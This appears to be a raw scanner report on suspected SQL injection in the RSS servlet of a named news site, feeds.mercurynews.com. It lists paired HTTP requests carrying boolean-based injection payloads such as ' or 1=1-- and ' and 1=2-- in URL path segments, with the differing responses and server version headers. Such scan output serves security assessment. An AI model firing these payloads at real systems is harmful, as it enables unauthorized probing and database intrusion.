<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d2--%20/568/200779.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:42 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11112058'%20or%201%3d1--%20 and 11112058'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi11112058'%20or%201%3d1--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:34 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi11112058'%20or%201%3d2--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:34 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12983011'%20or%201%3d1--%20 and 12983011'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d1--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d2--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:40 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13540988'%20or%201%3d1--%20 and 13540988'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi13540988'%20or%201%3d1--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi13540988'%20or%201%3d2--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:30 GMT
Date: Tue, 07 Dec 2010 23:20:30 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 39771848%20or%201%3d1--%20 and 39771848%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d1--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:40 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d2--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:49 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:50 GMT
Date: Tue, 07 Dec 2010 23:20:50 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14698078'%20or%201%3d1--%20 and 14698078'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi14698078'%20or%201%3d1--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:45 GMT
Date: Tue, 07 Dec 2010 23:20:45 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi14698078'%20or%201%3d2--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:45 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10825379'%20or%201%3d1--%20 and 10825379'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi10825379'%20or%201%3d1--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:37 GMT
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi10825379'%20or%201%3d2--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:51 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:51 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
